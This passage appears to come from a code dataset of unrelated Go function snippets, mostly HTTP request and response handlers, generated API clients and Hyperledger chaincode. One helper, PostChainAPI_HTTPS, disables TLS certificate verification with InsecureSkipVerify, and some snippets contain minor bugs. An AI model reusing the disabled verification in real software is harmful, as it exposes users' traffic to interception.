nil {\n return result, autorest.NewErrorWithError(err, \"httpinfrastructuregroup.HTTPSuccessClient\", \"Post202\", nil , \"Failure preparing request\")\n }\n\n resp, err := client.Post202Sender(req)\n if err != nil {\n result.Response = resp\n return result, autorest.NewErrorWithError(err, \"httpinfrastructuregroup.HTTPSuccessClient\", \"Post202\", resp, \"Failure sending request\")\n }\n\n result, err = client.Post202Responder(resp)\n if err != nil {\n err = autorest.NewErrorWithError(err, \"httpinfrastructuregroup.HTTPSuccessClient\", \"Post202\", resp, \"Failure responding to request\")\n }\n\n return\n}", "func (c *Campaigner) post(url string, i interface{}) (gorequest.Response, []byte, error) {\n\t// Locals.\n\tvar (\n\t\tr gorequest.Response\n\t\tb []byte\n\t\terrs []error\n\t)\n\n\t// Check API config.\n\tif err := c.CheckConfig(); err != nil {\n\t\treturn r, b, err\n\t}\n\n\t// Generate URL and JSON.\n\turl = c.GenerateURL(url)\n\tj, err := json.Marshal(i)\n\tif err != nil {\n\t\tlog.Fatalf(\"Could not marshal json for interface: %s\\n\", err)\n\t}\n\n\t// Send POST request.\n\tr, b, errs = gorequest.New().\n\t\tPost(url).\n\t\tSend(string(j)).\n\t\tSet(\"Api-Token\", c.APIToken).\n\t\tEndBytes()\n\n\t// Error check.\n\tif errs != nil {\n\t\treturn r, b, CustomError{Message: \"could not perform HTTP POST request\", HTTPErrors: errs}\n\t}\n\n\treturn r, b, nil\n}", "func (c *Client) post(urlStr string, form url.Values, data interface{}) error {\n\tresp, err := oauthClient.Post(c.HTTPClient, c.Credentials, urlStr, form)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer resp.Body.Close()\n\treturn c.decodeResponse(resp, data)\n}", "func (bft *ProtocolBFTCoSi) handleResponsePrepare(c chan responseChan) error {\n\tbft.tmpMutex.Lock()\n\tdefer bft.tmpMutex.Unlock() // NOTE potentially locked for the whole timeout\n\n\t// wait until we have enough RoundPrepare responses or timeout\n\t// does nothing if channel is closed\n\tif err := bft.readResponseChan(c, RoundPrepare); err != nil {\n\t\treturn err\n\t}\n\n\t// TODO this will only work for star-graphs\n\t// check if we have enough messages\n\tif len(bft.tempPrepareResponse) < len(bft.Children())-bft.allowedExceptions {\n\t\tlog.Error(\"not enough prepare response messages\")\n\t\tbft.signRefusal = true\n\t}\n\n\t// wait for verification\n\tbzrReturn, ok := bft.waitResponseVerification()\n\t// append response\n\tif !ok {\n\t\tlog.Lvl2(bft.Roster(), \"Refused to sign\")\n\t}\n\n\t// Return if we're not root\n\tif !bft.IsRoot() {\n\t\treturn bft.SendTo(bft.Parent(), bzrReturn)\n\t}\n\n\t// Since cosi does not support exceptions yet, we have to remove\n\t// the responses that are not supposed to be there,i.e. exceptions.\n\tcosiSig := bft.prepare.Signature()\n\tcorrectResponseBuff, err := bzrReturn.Response.MarshalBinary()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// signature is aggregate commit || aggregate response || mask\n\t// replace the old aggregate response with the corrected one\n\tpointLen := bft.Suite().PointLen()\n\tsigLen := pointLen + bft.Suite().ScalarLen()\n\tcopy(cosiSig[pointLen:sigLen], correctResponseBuff)\n\tbft.prepareSignature = cosiSig\n\n\t// Verify the signature is correct\n\tdata := sha512.Sum512(bft.Msg)\n\tsig := &BFTSignature{\n\t\tMsg: data[:],\n\t\tSig: cosiSig,\n\t\tExceptions: bft.tempExceptions,\n\t}\n\n\tif err := sig.Verify(bft.Suite(), bft.Roster().Publics()); err != nil {\n\t\tlog.Error(bft.Name(), \"Verification of the signature failed (handleResponsePrepare):\", err)\n\t\tbft.signRefusal = true\n\t\treturn err\n\t}\n\tlog.Lvl3(bft.Name(), \"Verification of signature successful\")\n\n\t// Start the challenge of the 'commit'-round\n\tif err := bft.startChallenge(RoundCommit); err != nil {\n\t\tlog.Error(bft.Name(), err)\n\t\treturn err\n\t}\n\treturn nil\n}", "func (s *streamer) submit(req *Request) (*Response, error) {\n\turl := s.c.Gateway + RequestRoot + req.Notification.Recipient\n\thttpReq, err := http.NewRequest(\"POST\", url, nil)\n\tif err != nil {\n\t\treturn nil, &RequestError{err}\n\t}\n\tif err := req.Notification.write(httpReq); err != nil {\n\t\treturn nil, &RequestError{err}\n\t}\n\tsigner := req.Signer\n\tif signer == nil {\n\t\tsigner = s.c.Signer\n\t}\n\tif signer != nil {\n\t\tif err := signer.SignRequest(httpReq); err != nil {\n\t\t\treturn nil, &RequestError{err}\n\t\t}\n\t}\n\tif req.Context != NoContext {\n\t\thttpReq = httpReq.WithContext(req.Context)\n\t}\n\tlogTrace(2, s.id, \"http.Request: %v\\n\", httpReq)\n\thttpResp, err := s.httpClient.Do(httpReq)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\ts.sizeCtr.Add(uint64(estimatedRequestWireSize(httpReq)))\n\tlogTrace(2, s.id, \"http.Response: %v\\n\", httpResp)\n\tdefer httpResp.Body.Close()\n\tres := &Response{\n\t\tStatusCode: httpResp.StatusCode,\n\t\tApnsID: httpResp.Header.Get(\"apns-id\"),\n\t}\n\tdecoder := json.NewDecoder(httpResp.Body)\n\tif err := decoder.Decode(&res); err != nil && err != io.EOF {\n\t\treturn &Response{}, &RequestError{err}\n\t}\n\treturn res, nil\n}", "func process(w http.ResponseWriter, r *http.Request, connectionType string) {\n\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\tw.Header().Set(\"Content-type\", \"text/plain\")\n\n\tvar macAddress string\n\tvar response string\n\n\tclientIP, _, netSplitErr := net.SplitHostPort(r.RemoteAddr)\n\n\tif netSplitErr != nil {\n\n\t\tlogger.Error(netSplitErr.Error())\n\t\thttp.Error(w, \"Invalid host IP/PORT\", http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tif r.Method == \"GET\" {\n\t\tmacAddress = r.URL.Path[1:]\n\t} else {\n\t\thttp.Error(w, r.Method+\" requests not accepted\", http.StatusMethodNotAllowed)\n\t\treturn\n\t}\n\n\tif macAddress == \"\" {\n\t\thttp.Error(w, \"No MAC address provided\", http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tcleanedMacAddress := cleanMacAddress(macAddress)\n\tcleanedAddressLength := len(cleanedMacAddress)\n\n\tvar vendor string\n\n\taddressMap.RLock()\n\tdefer addressMap.RUnlock()\n\n\tif cleanedAddressLength >= 9 {\n\t\t// Check for MA-S match\n\t\tif val, ok := addressMap.m[cleanedMacAddress[0:9]]; ok {\n\t\t\tvendor = val\n\t\t}\n\t}\n\n\tif vendor == \"\" && cleanedAddressLength >= 7 {\n\t\t// Check for MA-M match\n\t\tif val, ok := addressMap.m[cleanedMacAddress[0:7]]; ok {\n\t\t\tvendor = val\n\t\t}\n\t}\n\n\tif vendor == \"\" && cleanedAddressLength >= 6 {\n\t\t// Check for MA-L match\n\t\tif val, ok := addressMap.m[cleanedMacAddress[0:6]]; ok {\n\t\t\tvendor = val\n\t\t}\n\t}\n\n\tif vendor != \"\" {\n\t\tio.WriteString(w, vendor)\n\t\tresponse = vendor\n\t} else {\n\t\thttp.Error(w, \"Vendor not found\", http.StatusNotFound)\n\t\tresponse = \"Not Found\"\n\t}\n\n\tlogger.Info(\n\t\t\"api request\",\n\t\tzap.String(\"clientIp\", clientIP),\n\t\tzap.String(\"connectionType\", connectionType),\n\t\tzap.String(\"method\", r.Method),\n\t\tzap.String(\"macAddress\", cleanedMacAddress),\n\t\tzap.String(\"response\", response),\n\t)\n\n}", "func YuntongxunTelGo(accountSID string, applicationID string, token string, displayNum, defaultName, playTimes, tos string, content string) error {\n baseURL := \"https://app.cloopen.com:8883\"\n\n // filter numbers in blacklist\n tos = filter.BlackListFilter(tos)\n if tos == \"\" {\n log.Println(\"no receiver remain!\")\n return nil\n }\n\n // select media file\n mediaName := defaultName\n name, found := SelectYuntongxunMedia(content)\n if found {\n mediaName = name\n }\n\n // generate signature\n timestamp := time.Now().Format(\"20060102150405\")\n params := accountSID + token + timestamp\n md5Ctx := md5.New()\n md5Ctx.Write([]byte(params))\n signature := strings.ToUpper(hex.EncodeToString(md5Ctx.Sum(nil)))\n\n // generate reuqeust url\n requestURL := baseURL+\"/2013-12-26/Accounts/\"+accountSID+\"/Calls/LandingCalls?sig=\"+signature\n\n // generate authorization\n authorizationString := accountSID + \":\" + timestamp\n authorization := base64.StdEncoding.EncodeToString([]byte(authorizationString))\n\n // call each receiver in a loop\n toList := strings.Split(tos, \",\")\n for _, to := range toList {\n // prepare request body\n data := &YuntongxunTelData{AppID: applicationID, To: to, MediaName: mediaName, DisplayNum: displayNum, PlayTimes: playTimes}\n log.Printf(\"data is: %v\", data)\n dataJSON, err := json.Marshal(data)\n if err != nil {\n log.Printf(\"fail to prepare request data for %s: %s\", to, err.Error())\n return err\n }\n\n // caculate content length\n contentLength := len(dataJSON) \n \n // call\n timeout := time.Second * 5\n client := &http.Client{Timeout: timeout}\n request, err := http.NewRequest(\"POST\", requestURL, bytes.NewReader(dataJSON))\n request.Header.Add(\"Accept\", \"application/json\")\n request.Header.Add(\"Content-Type\", \"application/json;charset=utf-8\")\n request.Header.Add(\"Content-Length\",strconv.Itoa(contentLength))\n request.Header.Add(\"Authorization\", authorization)\n response, err := client.Do(request)\n if err != nil {\n log.Printf(\"fail to call %s: %s\", to, err.Error())\n return err\n }\n defer response.Body.Close()\n body, err := ioutil.ReadAll(response.Body)\n if err != nil {\n log.Printf(\"fail to read response data for %s: %s\", to, err.Error())\n return err\n }\n log.Printf(\"call %s successfully: %s\", to, string(body))\n }\n return nil\n}", "func processPOSTRequest(w http.ResponseWriter, r *http.Request, router func([]byte) error) {\n\tif valid := validMethodAndContentType(w, r); !valid {\n\t\treturn\n\t}\n\tbody, valid := validateAndGetPayload(r, w)\n\tif !valid {\n\t\treturn\n\t}\n\terr := router(body)\n\tif err != nil {\n\t\thttp.Error(w, \"Error processing the request\", http.StatusInternalServerError)\n\t\treturn\n\t}\n\tw.WriteHeader(http.StatusAccepted)\n\n}", "func ParsenewCustomerResponse(rsp *http.Response) (*newCustomerResponse, error) {\n\tbodyBytes, err := ioutil.ReadAll(rsp.Body)\n\tdefer rsp.Body.Close()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresponse := &newCustomerResponse{\n\t\tBody: bodyBytes,\n\t\tHTTPResponse: rsp,\n\t}\n\n\tswitch {\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 201:\n\t\tresponse.JSON201 = &Customer{}\n\t\tif err := json.Unmarshal(bodyBytes, response.JSON201); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\treturn response, nil\n}", "func main() {\n\n\tlipishaApp := lipisha.Lipisha{\n\t\tAPIKey: \"\",\n\t\tAPISignature: \"\",\n\t\tIsProduction: true,\n\t\tDebug: true}\n\n\taccountNumber := 123456\n\tmobileNumber := 254712345678\n\tcurrency := \"KES\"\n\tamount := 1000\n\n\t// Your unique identifier for this transaction, it will be sent to your IPN\n\tmerchantReference := \"1\"\n\n\tserverResponse, err := lipishaApp.RequestMoney(\n\t\taccountNumber,\n\t\tmobileNumber,\n\t\tamount,\n\t\t\"Paybill (M-Pesa)\",\n\t\tcurrency,\n\t\tmerchantReference)\n\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\n\tfmt.Println(serverResponse)\n\n\tvar responseMap map[string]*json.RawMessage\n\n\tif err := json.Unmarshal([]byte(serverResponse), &responseMap); err != nil {\n\t\tlog.Fatal(err)\n\t\treturn\n\t}\n\n\tstatus, err := getValueByUnmarshalToInterface(\"status\", responseMap[\"status\"])\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t\treturn\n\t}\n\n\tif status == \"SUCCESS\" {\n\n\t\treturn\n\n\t}\n\n}", "func (t *Procure2Pay) CreatePurchaseOrder(stub shim.ChaincodeStubInterface, args []string) pb.Response {\n\n var objpurchaseOrder purchaseOrder\n\tvar objitem item\n\tvar err error\n\t\n\tfmt.Println(\"Entering CreatePurchaseOrder\")\n\n\tif len(args) < 1 {\n\t\tfmt.Println(\"Invalid number of args\")\n\t\treturn shim.Error(err.Error())\n\t}\n\n\tfmt.Println(\"Args [0] is : %v\\n\", args[0])\n\n\t//unmarshal customerInfo data from UI to \"customerInfo\" struct\n\terr = json.Unmarshal([]byte(args[0]), &objpurchaseOrder)\n\tif err != nil {\n\t\tfmt.Printf(\"Unable to unmarshal CreatePurchaseOrder input purchaseOrder: %s\\n\", err)\n\t\treturn shim.Error(err.Error())\n\t\t}\n\n\tfmt.Println(\"purchase order object PO ID variable value is : %s\\n\", objpurchaseOrder.POID)\n\tfmt.Println(\"purchase order object PO ID variable value is : %s\\n\", objpurchaseOrder.Quantity)\n\n\t// Data insertion for Couch DB starts here \n\ttransJSONasBytes, err := json.Marshal(objpurchaseOrder)\n\terr = stub.PutState(objpurchaseOrder.POID, transJSONasBytes)\n\t// Data insertion for Couch DB ends here\n\n\t//unmarshal LoanTransactions data from UI to \"LoanTransactions\" struct\n\terr = json.Unmarshal([]byte(args[0]), &objitem)\n\tif err != nil {\n\t\tfmt.Printf(\"Unable to unmarshal CreatePurchaseOrder input purchaseOrder: %s\\n\", err)\n\t\treturn shim.Error(err.Error())\n\t\t}\n\n\tfmt.Println(\"item object Item ID variable value is : %s\\n\", objitem.ItemID)\n\n\t// Data insertion for Couch DB starts here \n\ttransJSONasBytesLoan, err := json.Marshal(objitem)\n\terr = stub.PutState(objitem.ItemID, transJSONasBytesLoan)\n\t// Data insertion for Couch DB ends here\n\n\tfmt.Println(\"Create Purchase Order Successfully Done\")\n\n\tif err != nil {\n\t\tfmt.Printf(\"\\nUnable to make transevent inputs : %v \", err)\n\t\treturn shim.Error(err.Error())\n\t\t//return nil,nil\n\t}\n\treturn shim.Success(nil)\n}", "func handleDBPostGettokenizedcards(w http.ResponseWriter, r *http.Request) {\n\tdefer func() {\n\t\tdb.Connection.Close(nil)\n\t}()\n var errorGeneral string\n var errorGeneralNbr string\n \n \tvar requestData modelito.RequestTokenizedCards\n\n errorGeneral=\"\"\n requestData, errorGeneral=obtainPostParmsGettokenizedcards(r,errorGeneral) //logicrequest_post.go\n\n\t////////////////////////////////////////////////process business rules\n\t/// START\n if errorGeneral==\"\" {\n\n\t\terrorGeneral,errorGeneralNbr= ProcessGettokenizedcards(w , requestData)\n\t}\n\t/// END\n if errorGeneral!=\"\"{\n \t//send error response if any\n \t//prepare an error JSON Response, if any\n\t\tlog.Print(\"CZ STEP Get the ERROR response JSON ready\")\n\t\t\n\t\t\t/// START\n\t\tfieldDataBytesJson,err := getJsonResponseError(errorGeneral, errorGeneralNbr)\n\t\t////////// write the response (ERROR)\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tw.Write(fieldDataBytesJson)\t\n\t\tif(err!=nil){\n\t\t\t\n\t\t}\n\t\n } \n\t\t\t\t\t\n}", "func (client BastionClient) createBastion(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodPost, \"/bastions\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response CreateBastionResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func ParseReplacechangeaspecificSubscriberResponse(rsp *http.Response) (*ReplacechangeaspecificSubscriberResponse, error) {\n\tbodyBytes, err := ioutil.ReadAll(rsp.Body)\n\tdefer rsp.Body.Close()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresponse := &ReplacechangeaspecificSubscriberResponse{\n\t\tBody: bodyBytes,\n\t\tHTTPResponse: rsp,\n\t}\n\n\tswitch {\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 200:\n\t\tvar dest Subscribers\n\t\tif err := json.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.JSON200 = &dest\n\n\t}\n\n\treturn response, nil\n}", "func PostChainAPI_HTTPS(url string, payLoad []byte) (respBody string, respStatus string) {\n\n\tveryverbose := false \t// for debugging github hyperledger fabric issue #2357\n\n\tif veryverbose {\n\t\tfmt.Println(\"PostChainAPI()_HTTPS url=\" + url) \n\t}\n tr := &http.Transport{\n TLSClientConfig: &tls.Config{InsecureSkipVerify: true},\n\t //TLSClientConfig: &tls.Config{RootCAs: nil},\n\t DisableCompression: true,\n }\n httpclient := &http.Client{ Transport: tr, Timeout: time.Second * waitSecs }\n\tif veryverbose {\n\t\tfmt.Println(\"PostChainAPI()_HTTPS calling http.Client.Post=\" + url) \n\t}\n\tresponse, err := httpclient.Post(url, \"json\", bytes.NewBuffer(payLoad))\n\tif veryverbose {\n\t\tfmt.Println(\"PostChainAPI() AFTER http.Client.Post\")\n\t}\n\n\tif err != nil {\n\t\tfmt.Println(\"PostChainAPI_HTTPS() httpclient.Post Error, url, response: \", url, response)\n\t\tfmt.Println(\"PostChainAPI_HTTPS() httpclient.Post Error, err: \", err)\n\t\treturn err.Error(), \"httpclient.Post Error\"\n\t}\n\tdefer response.Body.Close()\n\tbody, err := ioutil.ReadAll(response.Body)\n\tif err != nil {\n\t\tfmt.Println(\"PostChainAPI_HTTPS Error from ioutil.ReadAll, url, response: \", url, body)\n\t\tfmt.Println(\"PostChainAPI_HTTPS Error from ioutil.ReadAll, err: \", err)\n\t}\n\tif veryverbose {\n\t\tfmt.Println(\"PostChainAPI_HTTPS() secure postchain >>> response Status:\", response.Status)\n\t\tfmt.Println(\"PostChainAPI_HTTPS() secure postchain >>> response Body:\", body)\n\t}\n\t//return string(body), response.Status\n\treturn string(body), string(\"\")\n}", "func OpenAPIAdapterHandler(w http.ResponseWriter, r *http.Request) {\n\terr := r.ParseForm()\n\tif err != nil {\n\t\tcustomError(w, \"request body format error: \"+err.Error(), http.StatusBadRequest)\n\t\treturn\n\t}\n\tuserID := r.FormValue(\"userid\")\n\tappID := r.FormValue(\"appid\")\n\n\tuserIP, err := util.ParseRemoteIP(r.RemoteAddr)\n\tif err != nil {\n\t\tlogger.Warn.Printf(\"Warning: ip:port not fit. %s\\n\", r.RemoteAddr)\n\t}\n\ttrafficStat := &traffic.TrafficStat{\n\t\tAppID: appID,\n\t\tIP: userIP,\n\t\tUserID: userID,\n\t\tRequestURI: r.RequestURI,\n\t}\n\ttrafficManager.AddStat(trafficStat)\n\n\tvar (\n\t\tbody io.Reader\n\t\tbodyData []byte\n\t\tv2Req *http.Request\n\t\tresp *http.Response\n\t\tv1Resp data.ResponseV1\n\t\tv2Resp data.ResponseV2\n\t)\n\n\ttext := r.FormValue(\"text\")\n\n\tbodyData, err = json.Marshal(data.V2Body{\n\t\tText: text,\n\t})\n\tif err != nil {\n\t\tcustomError(w, \"request body format error: \"+err.Error(), http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tbody = bytes.NewBuffer(bodyData)\n\n\tremoteURL := fmt.Sprintf(\"%s/v1/openapi\", remoteHost)\n\tv2Req, err = http.NewRequest(http.MethodPost, remoteURL, body)\n\tif err != nil {\n\t\tcustomError(w, \"transform request failed, \"+err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tv2Req.Header.Set(\"appId\", appID)\n\tv2Req.Header.Set(\"userId\", userID)\n\n\t// Add headers for load balancing\n\tv2Req.Header.Set(\"X-Lb-Uid\", userID)\n\tresp, err = client.Do(v2Req)\n\tif err != nil {\n\t\tcustomError(w, \"http request failed, \"+err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\tbodyData, err = ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\tcustomError(w, \"io failed, \"+err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\tdefer resp.Body.Close()\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\n\terr = json.Unmarshal(bodyData, &v2Resp)\n\tlogger.Info.Printf(\"v2 response body: %s\\n\", bodyData)\n\tif err != nil {\n\t\tcustomError(w, \"unmarshal version 2 body failed, \"+err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tv1RespData := make([]data.DataV1, len(v2Resp.Answers))\n\n\tfor i, answer := range v2Resp.Answers {\n\t\tvar value string\n\t\tdataStr := \"\"\n\t\tindex := 1\n\n\t\tfor j, d := range answer.Data {\n\t\t\tif str, ok := d.(string); ok {\n\t\t\t\tdataStr += fmt.Sprintf(\"%d.%s\", index, str)\n\t\t\t\tif j != len(answer.Data)-1 {\n\t\t\t\t\tdataStr += \" \"\n\t\t\t\t}\n\t\t\t\tindex++\n\t\t\t}\n\t\t}\n\n\t\tif dataStr != \"\" {\n\t\t\tvalue = fmt.Sprintf(\"%s: %s\", answer.Value, dataStr)\n\t\t} else {\n\t\t\tvalue = answer.Value\n\t\t}\n\n\t\tv1RespData[i] = data.DataV1{\n\t\t\tType: \"text\",\n\t\t\tCmd: \"\",\n\t\t\tValue: value,\n\t\t\tData: []data.Answer{answer},\n\t\t}\n\t}\n\n\tv1Resp.ReturnCode = v2Resp.Code\n\tv1Resp.Message = v2Resp.Message\n\tv1Resp.Data = v1RespData\n\tv1Resp.Emotion = []data.Emotion{\n\t\tnewEmotion(v2Resp),\n\t}\n\n\tresult, _ := json.Marshal(v1Resp)\n\tw.Write(result)\n}", "func GenerateAPI(resp *svcsdk.GetApiOutput) *svcapitypes.API {\n\tcr := &svcapitypes.API{}\n\n\tif resp.ApiEndpoint != nil {\n\t\tcr.Status.AtProvider.APIEndpoint = resp.ApiEndpoint\n\t} else {\n\t\tcr.Status.AtProvider.APIEndpoint = nil\n\t}\n\tif resp.ApiGatewayManaged != nil {\n\t\tcr.Status.AtProvider.APIGatewayManaged = resp.ApiGatewayManaged\n\t} else {\n\t\tcr.Status.AtProvider.APIGatewayManaged = nil\n\t}\n\tif resp.ApiId != nil {\n\t\tcr.Status.AtProvider.APIID = resp.ApiId\n\t} else {\n\t\tcr.Status.AtProvider.APIID = nil\n\t}\n\tif resp.ApiKeySelectionExpression != nil {\n\t\tcr.Spec.ForProvider.APIKeySelectionExpression = resp.ApiKeySelectionExpression\n\t} else {\n\t\tcr.Spec.ForProvider.APIKeySelectionExpression = nil\n\t}\n\tif resp.CorsConfiguration != nil {\n\t\tf4 := &svcapitypes.CORS{}\n\t\tif resp.CorsConfiguration.AllowCredentials != nil {\n\t\t\tf4.AllowCredentials = resp.CorsConfiguration.AllowCredentials\n\t\t}\n\t\tif resp.CorsConfiguration.AllowHeaders != nil {\n\t\t\tf4f1 := []*string{}\n\t\t\tfor _, f4f1iter := range resp.CorsConfiguration.AllowHeaders {\n\t\t\t\tvar f4f1elem string\n\t\t\t\tf4f1elem = *f4f1iter\n\t\t\t\tf4f1 = append(f4f1, &f4f1elem)\n\t\t\t}\n\t\t\tf4.AllowHeaders = f4f1\n\t\t}\n\t\tif resp.CorsConfiguration.AllowMethods != nil {\n\t\t\tf4f2 := []*string{}\n\t\t\tfor _, f4f2iter := range resp.CorsConfiguration.AllowMethods {\n\t\t\t\tvar f4f2elem string\n\t\t\t\tf4f2elem = *f4f2iter\n\t\t\t\tf4f2 = append(f4f2, &f4f2elem)\n\t\t\t}\n\t\t\tf4.AllowMethods = f4f2\n\t\t}\n\t\tif resp.CorsConfiguration.AllowOrigins != nil {\n\t\t\tf4f3 := []*string{}\n\t\t\tfor _, f4f3iter := range resp.CorsConfiguration.AllowOrigins {\n\t\t\t\tvar f4f3elem string\n\t\t\t\tf4f3elem = *f4f3iter\n\t\t\t\tf4f3 = append(f4f3, &f4f3elem)\n\t\t\t}\n\t\t\tf4.AllowOrigins = f4f3\n\t\t}\n\t\tif resp.CorsConfiguration.ExposeHeaders != nil {\n\t\t\tf4f4 := []*string{}\n\t\t\tfor _, f4f4iter := range resp.CorsConfiguration.ExposeHeaders {\n\t\t\t\tvar f4f4elem string\n\t\t\t\tf4f4elem = *f4f4iter\n\t\t\t\tf4f4 = append(f4f4, &f4f4elem)\n\t\t\t}\n\t\t\tf4.ExposeHeaders = f4f4\n\t\t}\n\t\tif resp.CorsConfiguration.MaxAge != nil {\n\t\t\tf4.MaxAge = resp.CorsConfiguration.MaxAge\n\t\t}\n\t\tcr.Spec.ForProvider.CORSConfiguration = f4\n\t} else {\n\t\tcr.Spec.ForProvider.CORSConfiguration = nil\n\t}\n\tif resp.CreatedDate != nil {\n\t\tcr.Status.AtProvider.CreatedDate = &metav1.Time{*resp.CreatedDate}\n\t} else {\n\t\tcr.Status.AtProvider.CreatedDate = nil\n\t}\n\tif resp.Description != nil {\n\t\tcr.Spec.ForProvider.Description = resp.Description\n\t} else {\n\t\tcr.Spec.ForProvider.Description = nil\n\t}\n\tif resp.DisableExecuteApiEndpoint != nil {\n\t\tcr.Spec.ForProvider.DisableExecuteAPIEndpoint = resp.DisableExecuteApiEndpoint\n\t} else {\n\t\tcr.Spec.ForProvider.DisableExecuteAPIEndpoint = nil\n\t}\n\tif resp.DisableSchemaValidation != nil {\n\t\tcr.Spec.ForProvider.DisableSchemaValidation = resp.DisableSchemaValidation\n\t} else {\n\t\tcr.Spec.ForProvider.DisableSchemaValidation = nil\n\t}\n\tif resp.ImportInfo != nil {\n\t\tf9 := []*string{}\n\t\tfor _, f9iter := range resp.ImportInfo {\n\t\t\tvar f9elem string\n\t\t\tf9elem = *f9iter\n\t\t\tf9 = append(f9, &f9elem)\n\t\t}\n\t\tcr.Status.AtProvider.ImportInfo = f9\n\t} else {\n\t\tcr.Status.AtProvider.ImportInfo = nil\n\t}\n\tif resp.Name != nil {\n\t\tcr.Spec.ForProvider.Name = resp.Name\n\t} else {\n\t\tcr.Spec.ForProvider.Name = nil\n\t}\n\tif resp.ProtocolType != nil {\n\t\tcr.Spec.ForProvider.ProtocolType = resp.ProtocolType\n\t} else {\n\t\tcr.Spec.ForProvider.ProtocolType = nil\n\t}\n\tif resp.RouteSelectionExpression != nil {\n\t\tcr.Spec.ForProvider.RouteSelectionExpression = resp.RouteSelectionExpression\n\t} else {\n\t\tcr.Spec.ForProvider.RouteSelectionExpression = nil\n\t}\n\tif resp.Tags != nil {\n\t\tf13 := map[string]*string{}\n\t\tfor f13key, f13valiter := range resp.Tags {\n\t\t\tvar f13val string\n\t\t\tf13val = *f13valiter\n\t\t\tf13[f13key] = &f13val\n\t\t}\n\t\tcr.Spec.ForProvider.Tags = f13\n\t} else {\n\t\tcr.Spec.ForProvider.Tags = nil\n\t}\n\tif resp.Version != nil {\n\t\tcr.Spec.ForProvider.Version = resp.Version\n\t} else {\n\t\tcr.Spec.ForProvider.Version = nil\n\t}\n\tif resp.Warnings != nil {\n\t\tf15 := []*string{}\n\t\tfor _, f15iter := range resp.Warnings {\n\t\t\tvar f15elem string\n\t\t\tf15elem = *f15iter\n\t\t\tf15 = append(f15, &f15elem)\n\t\t}\n\t\tcr.Status.AtProvider.Warnings = f15\n\t} else {\n\t\tcr.Status.AtProvider.Warnings = nil\n\t}\n\n\treturn cr\n}", "func (client AppsClient) PublishResponder(resp *http.Response) (result ProductionOrStagingEndpointInfo, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusCreated),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func (r apiCreateCouponsForMultipleRecipientsRequest) Execute() (InlineResponse2007, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodPost\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue InlineResponse2007\n\t)\n\n\tlocalBasePath, err := r.apiService.client.cfg.ServerURLWithContext(r.ctx, \"ManagementApiService.CreateCouponsForMultipleRecipients\")\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, GenericOpenAPIError{error: err.Error()}\n\t}\n\n\tlocalVarPath := localBasePath + \"/v1/applications/{applicationId}/campaigns/{campaignId}/coupons_with_recipients\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"applicationId\"+\"}\", _neturl.QueryEscape(parameterToString(r.applicationId, \"\")), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"campaignId\"+\"}\", _neturl.QueryEscape(parameterToString(r.campaignId, \"\")), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\tif r.body == nil {\n\t\treturn localVarReturnValue, nil, reportError(\"body is required and must be specified\")\n\t}\n\n\tif r.silent != nil {\n\t\tlocalVarQueryParams.Add(\"silent\", parameterToString(*r.silent, \"\"))\n\t}\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{\"application/json\"}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\t// body params\n\tlocalVarPostBody = r.body\n\tif r.ctx != nil {\n\t\t// API Key Authentication\n\t\tif auth, ok := 